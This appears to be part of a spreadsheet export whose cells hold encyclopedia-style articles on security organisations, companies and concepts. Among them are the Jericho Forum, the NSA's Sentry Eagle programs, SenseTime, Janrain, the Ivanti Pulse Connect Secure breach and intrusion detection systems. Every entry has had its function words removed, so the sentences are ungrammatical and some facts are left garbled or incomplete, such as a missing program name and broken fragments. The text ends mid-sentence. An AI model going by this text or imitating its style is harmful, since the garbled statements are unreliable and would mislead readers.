security forum within open group continue, work identity continued global identity foundation. success closure jericho forum declared success sunsetted london conference opengroup october 2013 (video). jericho forum work identity carried global identity foundation, not-for-profit organisation working define components global digital identity ecosystem, identity "commandments" directly translating principles behind identity 3.0. publications visioning white paper what jericho forum? (v1.0, february 2005) jericho forum commandments [v1.0, april 2006] (v1.2, 2007) also white paper format (w124 v1.2, 2007) trust co-operation (v1.0, december 2006) also (w128 v1.0, december 2006) white paper business rationale de-perimeterisation (v1.0, january 2007) also (w127 v2.0, january 2007) cloud cube model: selecting cloud formations secure collaboration (v1.0, april 2009) also (w126, april 2009) jericho forum self-assessment scheme (v1.0, march 2010) also (g124, march 2010) jericho forum “identity” commandments (v1.0, 2011) also white paper format (w125 v1.0, 2011) webinar (d045, january 2012) framework secure collaboration-oriented architectures (o-scoa) (g127, september 2012) jericho forum identity commandments: concepts (g128, september 2012) trust ecosystem (g141, january 2014) smart data secure business collaboration (w140, january 2014) managing network entities collaborative world (w141, january 2014) protecting information: steps secure data future (w142, january 2014) need data principles (w143, january 2014) identity videos:- identity video identity first principles. introductory blog. identity video operating personas. introductory blog. identity video trust privacy. introductory blog. identity video entities entitlement. introductory blog. identity video building global identity ecosystem. introductory blog. position papers need inherently secure protocols (v1.0, april 2006) voip de-perimeterised world (v1.0, april 2006) wireless de-perimeterised world (v1.0, april 2006) internet filtering reporting (v1.1, july 2006) “enterprise information protection control” (digital rights management)(v1.0, october 2006) point security (v1.0, october 2006) federated identity (v1.0, november 2006) business rationale de-perimeterisation (v1.0, january 2007) information access policy management (v1.0, march 2007) audit de-perimeterised environment (v1.0, 2007) principles managing data privacy (v1.0, 2007) data/information management (v1.0, july 2007) need inherently secure communications (v1.0, january 2008) mobile working de-perimeterised environment (v1.0, 2008) collaboration oriented architectures [coa] (v1.0, april 2008) process person lifecycle management (draft v0.1, july 2008) process endpoint security (v1.0, october 2008) process risk lifecycle management (v1.0, november 2008) framework (v2.0, november 2008) process device lifecycle management (v1.0, november 2008) secure protocols mobile management (v1.1, december 2008) secure data: enterprise information protection control (v1.0, january 2009) information lifecycle management (v1.0, january 2009) external articles alan lawson world without boundaries” butler review journal article april 2005 http://www.butlergroup.com/research/docview.asp?id={bd1e4c70-f644-42f1-903e-cdbc09a38b8d} [membership required access document] “deperimeterisation become interesting idea requirement many organisations. vendors shown increasing willingness listen user community, absence coherent voice end-users themselves, uncertain listening. long jericho [forum] continue build upon foundations successfully integrate vendor input ongoing strategies, reason community become strong valuable voice years ahead.” paul stamp, robert whiteley laura koetzle michael rasmussen “jericho forum looks bring network walls tumbling down” forrester http://www.forrester.com/research/document/excerpt/0,7211,37317,00.html [chargeable document] “the jericho forum turning current security models heads, it’s likely affect much companies look orthodox security. jericho’s approach touches domains like digital rights management, network quality service, business partner risk management.” angela moscaritolo "cloud computing presents next challenge" world congress 2008 http://www.scmagazineus.com/sc-world-congress-cloud-computing-presents-next-challenge/article/122288/ "jericho forum preaching notion security open-network environment since group founded four years next year plans focus necessary steps secure cloud. forum relying security professionals help, seccombe said. “the idea bolting security already moved cloud dumb,” said. “you can't bolt security cloud; need build in.” also jericho forum commandments collaboration oriented architecture global identity foundation cloud security alliance references external links open group commandments: areas principles jericho forum jericho forum identity commandments</t>
  </si>
  <si>
    <t>Japan Vulnerability Notes</t>
  </si>
  <si>
    <t>japan vulnerability notes (jvn) japan's national vulnerability database. maintained japan computer emergency response team coordination center japanese government's information-technology promotion agency. references external links https://jvn.jp/en/</t>
  </si>
  <si>
    <t>Jason Healey</t>
  </si>
  <si>
    <t>jason healey senior research scholar adjunct professor school international public affairs, columbia university. also senior fellow cyber statecraft initiative atlantic council, program's founding director. published many academic articles, essays, books topic cyber security advised security measures corporate, government, military institutions. identified first historian cyber conflict. history healey born raised rhode island, joined united states force. graduated united states force academy 1991 commissioned officer. initially trained fighter pilot, healey transitioned signals intelligence 1998, began working pentagon, implementing computer network defense system. during force career, jason awarded meritorious service medals contributions cyber security. healey later received master's degree information security james madison university. work cybersecurity cyber policy healey's career focused principally cyber policy, implementation, addressing responses security threats. hong kong, vice president goldman sachs, developed crisis-response system address incidents across asia. also worked white house director cyber infrastructure protection. currently board member cyber conflict studies association military cyber professionals association. extent work magazine refer healey first historian cyber conflict.healey frequent public commentator written many articles malware threats cyber policy. healey discussed potential advantages disadvantages united states launching cyber-based attacks. regards offensive syria, stated "you longer drop physical bombs kill people... targeted, non-lethal microforce", surmised past leaks united states' involvement stuxnet, government agencies decided healey also commented heartbleed bug, noting discrepancy national security agency's stated priority defense failure expose found, said organization would "shredded computer security community" failure. 2013, healey took critical stance state mass surveillance united states. predicted u.s. interests abroad would suffer "deep long term damage" administration failed find alternatives spying conducted national security agency.in 2012, healey published first comprehensive history cyber-conflict, fierce domain, cyber conflict 1986 2012, positing confrontations within cyberspace established kind conflict, characteristics. explores development historical studies, beginning kgb's 1986 hacking initiative steal military plans u.s. referred cuckoo's case. book positively reviewed referred "definitive historical record cyber conflict."in march 2014, forbes identified healey twenty cyber policy experts follow twitter. publications cyber security policy guidebook (2012), co-author, published john wiley sons (isbn 9781118241325) fierce domain, cyber conflict 1986 2012 (2013), author, published cyber conflict studies association (isbn 9780989327404) references external links jason healey twitter next battlefield: cyber pritzker military museum library recorded september 2014 appearances c-span</t>
  </si>
  <si>
    <t>Sentry Eagle</t>
  </si>
  <si>
    <t>sentry eagle, national initiative protection program, compartmented program national security agency's (nsa) central security service (css) strategic command joint functional component command network warfare (jfcc-nw). existence revealed 2013 global surveillance disclosure edward snowden. program's efforts protect america's cyberspace includes efforts plan, synchronize, attack adversary's cyberspace computer network attack (cna). combination efforts referred nsa/css's jfcc-nw's core computer network operations (cno). capabilities include sigint, computer network exploitation (cne), information assurance, computer network defense (cnd), network warfare, computer network attack (cna). sentry eagle includes sub-programs: sentry hawk (for activities involving computer network exploitation, spying) sentry falcon (computer network defense) sentry osprey (cooperation intelligence agencies) sentry raven (breaking encryption systems) sentry condor (computer network operations attacks) sentry (collaborations private companies) sentry hawk sentry hawk program computer network exploitation program involving fbi. program attempts exploit computers, computer peripherals, computer-controlled devices, computer networks facilities housing them, publicly accessible computing networking infrastructure. targets include specific firewalls, operating systems, software applications. program operates benefit partnerships commercial sector companies. sentry falcon sentry falcon program computer network defense program focused attack attribution. sentry osprey sentry osprey program collaborative program national clandestine service (ncs), fbi, defense clandestine service defense intelligence agency perform target exploitation (tarex) foreign communication infrastructure. sentry raven sentry raven program involves secret efforts weaken commercial encryption systems software order make exploitable sigint. cryptosystems targeted include systems used private sector developed companies. sentry raven involves super computers special purpose cryptanalytic hardware software break foreign ciphers. also involves spending hundreds millions dollars special purpose computer systems attack commercial encryption systems, including exploitation weaknesses places cooperating companies undercover agents within companies. sentry condor sentry condor program involves provision cyber target identification recognition material tools techniques allow computer network attack targets. sentry sentry program involves industry personnel, undercover personnel foreign employers, enable sigint operations foreign commercial communications products. program includes contracts foreign commercial entities subvert privacy features products foreign domestic consumers (for content metadata). also list government surveillance projects mass surveillance signals intelligence references</t>
  </si>
  <si>
    <t>Sendmail, Inc.</t>
  </si>
  <si>
    <t>sendmail, inc. email management business. company headquartered emeryville, offices throughout americas, europe asia. history company founded 1998 eric allman, creator sendmail open source mail transfer agent. managing email 2005, sendmail released sentrion email infrastructure platform address need full-content message inspection, enabling policy-based delivery human machine-generated email. hybrid cloud 2012, sendmail partnered mimecast provide hybrid-cloud email security, archiving continuity predicted 2013 would organizations implementing hybrid cloud computing strategies reduce cost complexity messaging infrastructure. machine-generated email 2012, sendmail released sentrion reac (rogue email application control) amid growing security, compliance concerns posed growth application-generated email migration email cloud. acquired proofpoint 2013, sendmail acquired security-as-a-service company proofpoint, inc. timeline 1998 released switch, commercial 2000 released sendmail milter 2001 released mailstream manager email security compliant policy management 2003 released mailcenter enterprise 2005 shipped first sentrion™ appliance 2006 celebrated 25th anniversary internet email (mta) 2007 shipped sentrion ‘inbound outbound’ appliance 2008 released sentrion sentrion™ 2009 released sentrion cloud services (saas) 2010 opened sentrion store (www.sentrionappstore.com) 2011 sendmail teams harris trusted enterprise cloud 2011 released sentrion critical customer communications enterprise application suite 2012 released sentrion reac (rogue email application control) 2013 acquired proofpoint, inc. references</t>
  </si>
  <si>
    <t>SenseTime</t>
  </si>
  <si>
    <t>sensetime (chinese: 商汤科技) hong kong-headquartered artificial intelligence company offices china, indonesia, japan, south korea, macau, malaysia, philippines, saudi arabia, singapore, taiwan, thailand united arab emirates. company develops technologies including facial recognition, image recognition, object detection, optical character recognition, medical image analysis, video analysis, autonomous driving, remote sensing. since 2019, sensetime repeatedly sanctioned u.s. government allegations facial recognition technology deployed surveillance internment uyghurs ethnic religious minorities. sensetime denies allegations. history 2014 sensetime co-founded october 2014 tang xiao'ou, professor department information engineering chinese university hong kong (cuhk), computer scientist among others. during 2014, sensetime unveiled face recognition algorithms, deepid. 2015 during 2015, nine sensetime's papers accepted conference computer vision pattern recognition (cvpr). 2016 2016, sensetime's papers accepted cvpr conference, year's imagenet competition, company first place object detection, video object detection, scene analysis. 2017 2017, sensetime publications recognized cvpr international conference computer vision (iccv).in october 2017, qualcomm entered collaboration agreement sensetime. following month, shanghai municipal government signed strategic alliance agreement sensetime. december 2017, honda sensetime signed collaboration agreement.in november 2017, sensetime 'smart policing' company leon, major supplier data analysis surveillance technology xinjiang. 2018 february 2018, sensetime announced creation programme advance research. programme cancelled 2020 following revelations sensetime's involvement persecution uyghurs ethnic religious minorities.in april 2018, sensetime, alibaba, hong kong science technology parks corporation (hkstp) partnered together form nonprofit artificial intelligence hong kong. following month, sensetime signed collaborative memorandum understanding nanyang technological university (ntu), national supercomputing centre singapore singapore telecommunications limited (singtel). august summer, sensetime launched first north american smart health jersey.in september 2018, sensetime became founding members global artificial intelligence academic alliance (gaiaa), along chinese university hong kong, massachusetts institute technology, university sydney, shanghai jiao tong university, tsinghua university, fudan university, zhejiang university, nanyang technological university, seven universities.on september 2018, sensetime named china's national open innovation platform next-generation artificial intelligence intelligent vision.the wall street journal reported sensetiime valued $7.7 billion 2018. 2019 sensetime joined mit's quest intelligence campaign.sensetime large high-performance computing network supports development fielding applications. according report gregory allen center american security, sensetime's computing network includes "54,000,000 graphical processing unit (gpu) cores across 15,000 gpus within clusters."in april 2019, york times reported sensetime's software used development facial recognition systems used chinese government. november 2019, sensetime committee tasked developing standard facial recognition china.in october 2019, sensetime placed united states bureau industry security's entity list using technology human rights abuses xinjiang. 2020 august 2020, bloomberg news reported sensetime considering hong kong. 2021 july, sensetime appointed cixin advisor sci-fi research project. july, sensetime launched international innovation singapore.in august, sensetime filed hong kong stock exchange and, november, received regulatory approval list.in september 2021, axios reported sensetime uses subsidiary, shanghai sensetime, sidestep u.s. sanctions targeting subsidiary beijing sensetime.on december 2021, human rights day, united states department treasury placed company investment blacklist pricing alleged human rights abuses xinjiang, banning u.s. investment company. company denied allegations, said “been caught middle geopolitical disputes," postponed hong kong plan. company hired firm hughes hubbard reed, argued investment apply company's parent domiciled cayman islands.the ipo, already downsized expected us$2 billion $767 million crackdown tech companies, delayed further. december, sensetime announced postpone ipo. $767 million hong kong dollars offering relaunched hong kong december. december, sensetime completed hong kong stock exchange. 2022 february index compiler hang seng indexes added sensetime hang seng tech index.on august sensetime launched first consumer-facing product senserobot chinese chess-playing robot. references external links official website</t>
  </si>
  <si>
    <t>Sentrigo</t>
  </si>
  <si>
    <t>sentrigo privately held software company located santa clara, california, usa, acquisition april, 2011 mcafee.the company founded 2006 nathan shuchami slavik markovich, address several challenges database security. specifically, inability monitor activity privileged users established credentials nefarious means, difficulty maintaining dbms current patch level. company's products expanded include broader suite database security offerings, including database audit vulnerability assessment well. investors sentrigo included: benchmark capital, stata ventures juniper networks. hedgehog database security suite hedgehog family products providing vulnerability assessment database activity monitoring purposes reducing risks data breach meeting compliance regulations related sensitive data. hedgehog allows customers protect databases oracle, microsoft server, sybase, without interfering day-to-day operations. hedgehog enterprise database activity monitoring company's primary product, introduced 2007, hedgehog enterprise provides core monitoring capability based sensor server model. sensor resides database server's monitors memory/cache suspect database transactions, sending alerts real-time management console. thus, unlike network-based host-based intrusion detection systems (ids) intrusion prevention systems (ips), hedgehog fully monitor databases running virtual machines even cloud. server java-based application communicates sensors centrally monitor hundreds databases. based policies rules, system audit, alert suspend sessions violate preset conditions. hedgehog dbscanner announced september, 2010, hedgehog dbscanner enterprise vulnerability assessment solution databases. includes capabilities automatically finding databases network, subjects 3,000 different security checks. reports provide details discovered vulnerabilities current patch level, weak passwords, shared accounts, configuration errors, insecure database code. dbscanner implemented along hedgehog enterprise, case shares common management console, standalone module. hedgehog vpatch vpatch, solution "virtual patching" databases overcome problem many customers unable apply security patches databases timely manner. this inability schedule downtime production system, time testing party support applications database, numerous reasons. sentrigo vpatch includes rules generate alerts known vulnerabilities exploited, used terminate attackers' database sessions. vpatch rules updated frequent basis security updates issued dbms vendor, vulnerabilities discovered sentrigo's research team partners. hedgehog identifier common practice developing applications (and applications particular) database accounts (common schema) pooled connections enhance application performance. using approach raises problem full end-to-end user tracking database layer. database unable end-user details like username address, seeing application server common schema account. hedgehog identifier solves problem providing application server plug-in captures end-user information transparently propagates database tier using standard database apis. application changes required. identifier supports custom java .net applications well major business applications. some technical details available blog entry. fuzzor fuzzor (fuzzer oracle) open source software tool developed sentrigo. fuzzor provides database administrators programmers ability test pl/sql code security vulnerabilities. tool discovers vulnerabilities attempting exploit code particularly helpful finding injection buffer overflow vulnerabilities. sentrigo provides tool free charge. references external links official site musings database security slavik markovich fuzzing tool helps oracle dbas defend injection</t>
  </si>
  <si>
    <t>Senstar Corporation</t>
  </si>
  <si>
    <t>senstar corporation develops manufactures perimeter intrusion detection systems, video management software, security lighting, personal duress systems, access control software physical security video surveillance industries. headquarters located ottawa, ontario. senstar products protect facilities around world, including critical infrastructure sites, military bases, nuclear power plants, airports, personal estates, borders, correctional facilities. technology fiber optic sensors senstar's fiberpatrol intrusion detection sensors based optical time domain reflectometry, nature location minute disturbances along sensor cable tracked located rayleigh scattering. also known distributed acoustic sensor (das), fiberpatrol used fence-mounted, wall-top, buried applications. while fiber optic sensors well-established fence-mounted sensor technology, buried applications received extensive attention suitability smart fence technology high-profile applications us-mexico border. fence sensors senstar developed range fence-mounted cable-based sensors used high-security applications around world, including canadian u.s. correctional faculties, nato rapid deployment camps, seaport security. hybrid intelligent lighting intrusion detection sensors senstar's lm100 world's first hybrid perimeter intrusion detection intelligent lighting system, combining led-based intelligent perimeter lighting accelerometer-based intrusion detection sensors. senstar lm100 international dark-sky association approved used cannabis, airport, electrical utility applications. buried volumetric sensors senstar's omnitrax buried volumetric intrusion sensor based ported coaxial cable technology, generates electromagnetic detection field along length buried cable. sensor commonly used protect government buildings, diplomatic residences, personal estates, correctional facilities. personal duress systems senstar personal duress systems found correctional facilities throughout north american, including operated correctional services canada, u.s. state correctional institutions, u.s. federal bureau prisons. video analytics senstar offers wide range intelligent video analytics products, including outdoor people vehicle tracking, automatic license plate recognition, face recognition, indoor people tracking, auto-tracking. 2020, senstar announced safe spaces product line, video analytics designed assist organizations following public health guidelines covid-19 pandemic. video management software senstar sells video management software (vms) markets name senstar symphony. software provides video monitoring, recording, event management, intrusion monitoring, access control functionality. open platform, supports onvif-compatible network cameras. history senstar started 1981 spin-off computing devices division control data canada (cdc). founders created sentrax, world's first ported coaxial cable sensor. early adopters technology included u.s. military well correctional service canada, installed buried sensor system correctional facilities throughout canada.in 1994 senstar acquired dornier group daimler benz. 1997 senstar sold magal security systems, previously purchased stellar security systems 1993, manufacturer electrostatic field triboelectric fence-mounted sensors. organization went name senstar-stellar corporation north american operations, senstar remained name european operations. 1998 magal acquired perimeter products inc., manufacturer fence-mounted sensors bistatic microwave sensors, remained separate entity. 2003 senstar, perimeter products inc., acquired dominion wireless, manufacturer personal duress systems, three organizations consolidated 2009 ottawa headquarters senstar brand. 2014 magal purchased optellios, manufacturer long-range fiber optic sensors, merged organization main senstar operations.in 2016 senstar amalgamated aimetis, waterloo-based company specializing ai-based video analytics video management software. industry memberships senstar actively engaged security industry, memberships following organizations: open network video interface forum (onvif) canadian security association (canasa) security industry association (sia) asis international references</t>
  </si>
  <si>
    <t>Janrain</t>
  </si>
  <si>
    <t>janrain, sometimes styled janrain, customer profile identity management (ciam) software provider based portland, oregon, united states. established 2002. akamai acquired janrain january 2019. history janrain founded portland 2002 larry drebes, 2016 company's chief technology officer (cto), former chief executive officer (ceo). firm's name "references january portland", described "leading provider customer profile identity management". according forbes, drebes recognized value social media 2004 predicted need users manage online identities. helped create openid protocol, called "decentralized authentication method web". janrain founding member openid foundation advocated openid. privately held company, janrain grown steadily since inception.in december 2009, janrain raised us$3.25 million american venture capital firms frontier, ventures, anthem venture partners. according techcrunch, firms invested janrain's ability "effectively mass market sell authentication systems website publishers based openid online identity technologies". oregonian venturebeat reported janrain employees mid-2011. august 2011, company announced $15.5 million funding round emergence capital partners, used hiring staff marketing. emergence founder brian jacobs joined janrain's board directors. that month, company funding totaling $18.7 million four venture capital firms, well timothy draper, drebes. janrain's sales "more doubled" 2012, company expected quicker sales growth rate 2013. janrain employees january 2013. that month, firm received million investment, marking largest venture capital rounds internet company oregon. funding millennium technology value partners, additional participation frontier ventures, existing investors emergence capital anthem venture partners, plus epic ventures, salesforce.com, split rock partners. including 2013 investment, twice amount venture investment oregon 2012, janrain raised $52–53 million, noted "best-funded young technology" businesses state. company reportedly planned money employ salespeople engineers, enhance technology, features software, enter markets outside u.s. february 2013, austin, texas-based company umbel announced partnership janrain combine former company's "real-time audience insights" technology latter's "user management platform, providing actionable intelligence rich social data, real-time". december 2014, janrain acquired startup company arktan undisclosed amount. janrain began offering data services developed companies, worked together "several years" acquisition. according advertising age, janrain grown employees; drebes said would executive changes arktan's five employees. inc. reported janrain earned $14.3 million revenue 2014, three-year growth rate 294%, employed people—44 previous year. 2015, firm expanded international reach building data center china. september 2015, portland business journal said janrain employed "around 120, portland", raised $52.8 million date investors. december 2015, company secured additional million series funding, highbar partners.the company's headquarters dekum building southwest third avenue downtown portland. janrain moved building 2009, occupying sixth floor, vacated moved three others february 2013. according portland business journal, much office space's "funky" modern romanesque architecture existed previously, though updates made company relocated. space open design glass walls offices, game room, spiral staircase connecting floors, atrium extending eighth floor skylight. also quiet, private spaces nursing mothers, telephone calls, work rooms. conference rooms floor named mountains pacific northwest, another level named portland's bridges. janrain turned basketball court building's fourth floor, left previous occupant wieden+kennedy, conference room meeting space. janrain open remote work, portland business journal said unique portland. company satellite offices frankfurt, london, paris.in april 2016, kaskade joined janrain ceo. hired turn conversica late-2019. clients december 2009, techcrunch reported janrain's technology used websites music, news, kmart, sears, universal music group. pepper snapple group began using janrain's identity management services digital properties 2011. intel also confirmed clients 2011. january 2013, avis, bbc, british public-service television broadcaster channel comedy central, financial times fox, networks, mattel, npr, pac-12 conference, philips, samsung, whole foods market confirmed clients. pfizer became client 2014, confirmed september 2015. technology rpx, software service (saas) platform on-site openid account acceptance, described janrain's "flagship" product. more 170,000 websites using solution december 2009. according venturebeat, "janrain engage" enables social sharing, "janrain capture" gathers stores profile data, allows sharing profiles across websites; "janrain federate" enables single sign-on websites. 2012, company launched "one-click sharing mechanism" facebook, giving users greater control sharing behaviors. janrain's services used 350,000 websites january 2013. techcrunch said data collected company's technology user log-ins helped clients "provide better on-site in-app experiences users", "these experiences could include personalized offers promotions based user's social demographics data. janrain user management platform (jump) provides single, unified view users across multiple online properties social identities, includes products social login, profile data storage, registration, single sign-on."janrain's "social login" technology enables websites offer registration profiles facebook, google, linkedin, twitter, social media sites. uses profile data, user's age, gender, interests, location, allowing marketers target advertising messages. according oregonian's mike rogoway, janrain "encourages clients minimize online visitors share, least initially, build trust". janrain hired technology attorney lewis barr serve vice president "legal privacy matters", inform clients appropriate legal collection digital information.in june 2014, company launched "janrain user-generated content" ("janrain ugc"); according adweek, service "allows brands give fans ability interact, comment chat content sites [and] allowing easily discover friends’ activities sites" "better create personalized brand experiences". features include comments, activity streams, live chat, social post curation, redesigned social sharing. firm's "social profile navigator" provides users overview data sharing social media sites. arktan, janrain acquired 2014, developed technology analyzes facebook data enables comments, polls, reviews, services. arktan also developed social television technology partnered facebook india generate on-air online graphics using data facebook keyword insights 2014 indian premier league cricket event. jyte jyte community-based website created janrain late january 2007, named acronym "just tell 'em". according developers, jyte allowed users "make claims [themselves], others, anything". these "claims" consisted headline and, optionally, short text body. they could also assigned user-selected tags. claim presented declarative sentence. site users could vote selecting whether agree disagree. total number people voted, well votes, displayed claim. users could also leave comments claims, without voting. article described jyte example "democracy internet," "can appear give rise amazing insights."in addition, users could give "cred". cred consisted short word phrase, tag, applied user. example, user made valid claim darts, user mary might assign "darts" cred. receiving cred increased recipient user's "cred score". cred designed give idea trustworthy user given area, well interests.jyte developed primarily ruby rails, interoperable sites means several apis. relied solely openid user authentication. one's openid multiple websites environments creation non-anonymous, portable, weighted, persistent online reputation could provide advantages user future discussions online line contexts. jyte described source arbitrary opinions.the website since extinct. acquired "aboutus" 2010, sometime later wholly ceased exist. reception inc. ranked janrain number 264, number 455, number 723, number 1,412 annual "inc. 5000 rank" 2012 2015, respectively. magazine's "inc. 5000 honors" 2015 named janrain "five-time inc. 5000 honoree", number companies portland, number companies oregon. january 2014, janrain named winner watchlist 2014, compiled paul greenberg zdnet blog, "social crm: conversation". greenberg said janrain's submission best-written year. janrain ranked number number deloitte's "technology fast 500" 2014 2015, respectively. deloitte listed company's growth rates 1,741% (2014) 291% (2015).in september 2014, o.c. tanner named janrain "top coolest companies work portland", saying "focuses customer success, employee success, product awesomeness, company success—all drive collaborative culture". according o.c. tanner, janrain's core values "passion, humility, collegiality, ability"; said janrain's infrastructure supports primary business objectives provides "environment encourages employees innovative, creative respectful another". o.c. tanner also wrote, "every individual contributing role impact company success, provided tools encouragement showcase passion things done [t]he commitment innovation technology evident annual brainstorming engineering blender activities take place encourage ideas every part company". 2015, janrain finalist "growth stage" category annual holce entrepreneurship awards, presented oregon entrepreneurs network. also list companies based oregon references further reading barden, (august 2010). "how quickly enable social logins janrain engage". readwrite. greenberg, paul (march 2014). "crm watchlist 2014 winners: onesies bpmonline, janrain, lattice engines". zdnet. menacker, seth (may 2015). "janrain announces newest version drupal module package" (press release). marketwatch. tallgrass public relations. jyte team's blog jyte techcrunch beginner's guide jyte beginner's guide jyte dutch external links official website</t>
  </si>
  <si>
    <t>John Lennon Artificial Intelligence Project</t>
  </si>
  <si>
    <t>john lennon artificial intelligence project chatterbot designed simulate conversation john lennon. developed "persona-bot" triumph online, based washington, d.c. triumph pc's "persona-bots" software programs attempt mimic personalities quirks particular historical figures conversation. development since 1997, jlai project (originally called plastic digital karma project) claims achieved similarity lennon's speech patterns, still achieve seamlessness conversation real person. references feature evening standard article stereophile article austin chronicle official site</t>
  </si>
  <si>
    <t>Ivanti Pulse Connect Secure data breach</t>
  </si>
  <si>
    <t>april 2021, reported suspected chinese-state backed hacker groups breached multiple government agencies, defense companies financial institutions europe hackers created used zero-day exploit ivanti pulse connect secure devices. cybersecurity infrastructure security agency alert reported attacks using exploited started june 2020 earlier. attacks believed third major data breach u.s. past year behind 2020 united states federal government data breach 2021 microsoft exchange server data breach. impact cybersecurity infrastructure security agency alert reported attacks affected "u.s. government agencies, critical infrastructure entities, private sector organizations." spokesperson ivanti said "limited number" customers compromised. mandiant's chief financial officer charles carmakal said hack small indication large number victims. said breach significant allowed unauthorized access federal corporate systems months. responses spokesperson ivanti said mitigations place patch vulnerabilities expected may. with patch finally released 2021. cisa issued emergency directive requiring federal agencies install product updates. china denied behind attack accused u.s. "biggest empire hacking tapping." also 2020 united states federal government data breach 2021 microsoft exchange server data breach references</t>
  </si>
  <si>
    <t>Service provider (SAML)</t>
  </si>
  <si>
    <t>saml service provider system entity receives accepts authentication assertions conjunction single sign-on (sso) profile security assertion markup language (saml). saml domain model, saml relying party system entity receives accepts information another system entity. particular interest saml relying party receives accepts saml assertion issued saml authority. important type saml authority saml identity provider, system entity issues authentication assertions conjunction profile saml. relying party consumes assertions called saml service provider simply service provider domain understood). thus saml service provider system entity receives accepts authentication assertion issued saml identity provider. also security assertion markup language (saml) saml identity provider saml-based products services references</t>
  </si>
  <si>
    <t>Intrusion detection system</t>
  </si>
  <si>
    <t>intrusion detection system (ids; also intrusion prevention system ips) device software application monitors network systems malicious activity policy violations. intrusion activity violation typically reported either administrator collected centrally using security information event management (siem) system. siem system combines outputs multiple sources uses alarm filtering techniques distinguish malicious activity false alarms.ids types range scope single computers large networks. common classifications network intrusion detection systems (nids) host-based intrusion detection systems (hids). system monitors important operating system files example hids, system analyzes incoming network traffic example nids. also possible classify detection approach. well-known variants signature-based detection (recognizing patterns, malware) anomaly-based detection (detecting deviations model "good" traffic, often relies machine learning). another common variant reputation-based detection (recognizing potential threat according reputation scores). some products ability respond detected intrusions. systems response capabilities typically referred intrusion prevention system. intrusion detection systems also serve specific purposes augmenting custom tools, using honeypot attract characterize malicious traffic. comparison firewalls although relate network security, differs firewall traditional network firewall (distinct next-generation firewall) uses static rules permit deny network connections. implicitly prevents intrusions, assuming appropriate rules defined. essentially, firewalls limit access networks prevent intrusion signal attack inside network. describes suspected intrusion taken place signals alarm. also watches attacks originate within system. this traditionally achieved examining network communications, identifying heuristics patterns (often known signatures) common computer attacks, taking action alert operators. system terminates connections called intrusion prevention system, performs access control like application layer firewall. intrusion detection category classified detection takes place (network host) detection method employed (signature anomaly-based). analyzed activity network intrusion detection systems network intrusion detection systems (nids) placed strategic point points within network monitor traffic devices network. performs analysis passing traffic entire subnet, matches traffic passed subnets library known attacks. once attack identified, abnormal behavior sensed, alert sent administrator. example nids would installing subnet firewalls located order someone trying break firewall. ideally would scan inbound outbound traffic, however might create bottleneck would impair overall speed network. opnet netsim commonly used tools simulating network intrusion detection systems. systems also capable comparing signatures similar packets link drop harmful detected packets signature matching records nids. when classify design nids according system interactivity property, types: on-line off-line nids, often referred inline mode, respectively. on-line nids deals network real time. analyses ethernet packets applies rules, decide attack not. off-line nids deals stored data passes processes decide attack not. nids also combined technologies increase detection prediction rates. artificial neural network based capable analyzing huge volumes data, smart way, self-organizing structure allows efficiently recognize intrusion patterns. neural networks assist predicting attacks learning mistakes; help develop early warning system, based layers. first layer accepts single values, second layer takes first's layers output input; cycle repeats allows system automatically recognize unforeseen patterns network. this system average 99.9% detection classification rate, based research results network attacks, divided four categories: dos, probe, remote-to-local, user-to-root. host intrusion detection systems host intrusion detection systems (hids) individual hosts devices network. hids monitors inbound outbound packets device alert user administrator suspicious activity detected. takes snapshot existing system files matches previous snapshot. critical system files modified deleted, alert sent administrator investigate. example hids usage seen mission critical machines, expected change configurations. detection method signature-based detection attacks looking specific patterns, byte sequences network traffic, known malicious instruction sequences used malware. this terminology originates anti-virus software, refers detected patterns signatures. although signature-based easily detect known attacks, difficult detect attacks, pattern available. signature-based ids, signatures released vendor products. on-time updating signature aspect. anomaly-based anomaly-based intrusion detection systems primarily introduced detect unknown attacks, part rapid development malware. basic approach machine learning create model trustworthy activity, compare behavior model. since models trained according applications hardware configurations, machine learning based method better generalized property comparison traditional signature-based ids. although approach enables detection previously unknown attacks, suffer false positives: previously unknown legitimate activity also classified malicious. most existing idss suffer time-consuming detection process degrades performance idss. efficient feature selection algorithm makes classification process used detection reliable.new types could called anomaly-based intrusion detection systems viewed gartner user entity behavior analytics (ueba) evolution user behavior analytics category) network traffic analysis (nta). particular, deals malicious insiders well targeted external attacks compromised user machine account. gartner noted organizations opted traditional ids. intrusion prevention some systems attempt stop intrusion attempt neither required expected monitoring system. intrusion detection prevention systems (idps) primarily focused identifying possible incidents, logging information them, reporting attempts. addition, organizations idps purposes, identifying problems security policies, documenting existing threats deterring individuals violating security policies. idps become necessary addition security infrastructure nearly every organization.idps typically record information related observed events, notify security administrators important observed events produce reports. many idps also respond detected threat attempting prevent succeeding. they several response techniques, involve idps stopping attack itself, changing security environment (e.g. reconfiguring firewall) changing attack's content.intrusion prevention systems (ips), also known intrusion detection prevention systems (idps), network security appliances monitor network system activities malicious activity. main functions intrusion prevention systems identify malicious activity, information activity, report attempt block stop it.. intrusion prevention systems considered extensions intrusion detection systems monitor network traffic and/or system activities malicious activity. main differences are, unlike intrusion detection systems, intrusion prevention systems placed in-line able actively prevent block intrusions detected.: take actions sending alarm, dropping detected malicious packets, resetting connection blocking traffic offending address. also correct cyclic redundancy check (crc) errors, defragment packet streams, mitigate sequencing issues, clean unwanted transport network layer options.: classification intrusion prevention systems classified four different types: network-based intrusion prevention system (nips): monitors entire network suspicious traffic analyzing protocol activity. wireless intrusion prevention system (wips): monitor wireless network suspicious traffic analyzing wireless networking protocols. network behavior analysis (nba): examines network traffic identify threats generate unusual traffic flows, distributed denial service (ddos) attacks, certain forms malware policy violations. host-based intrusion prevention system (hips): installed software package monitors single host suspicious activity analyzing events occurring within host. detection methods majority intrusion prevention systems utilize three detection methods: signature-based, statistical anomaly-based, stateful protocol analysis.: signature-based detection: signature-based monitors packets network compares pre-configured pre-determined attack patterns known signatures. statistical anomaly-based detection: anomaly-based monitor network traffic compare established baseline. baseline identify "normal" network sort bandwidth generally used protocols used. however, raise false positive alarm legitimate bandwidth baselines intelligently configured. ensemble models matthews correlation co-efficient identify unauthorized network traffic obtained 99.73% accuracy. stateful protocol analysis detection: this method identifies deviations protocol states comparing observed events "pre-determined profiles generally accepted definitions benign activity". placement correct placement intrusion detection systems critical varies depending network. common placement behind firewall, edge network. this practice provides high visibility traffic entering network receive traffic users network. edge network point network connects extranet. another practice accomplished resources available strategy technician place first point highest visibility depending resource availability place another next highest point, continuing process points network covered.if placed beyond network's firewall, main purpose would defend noise internet but, importantly, defend common attacks, port scans network mapper. position would monitor layers model would signature-based. this useful practice, rather showing actual breaches network made firewall, attempted 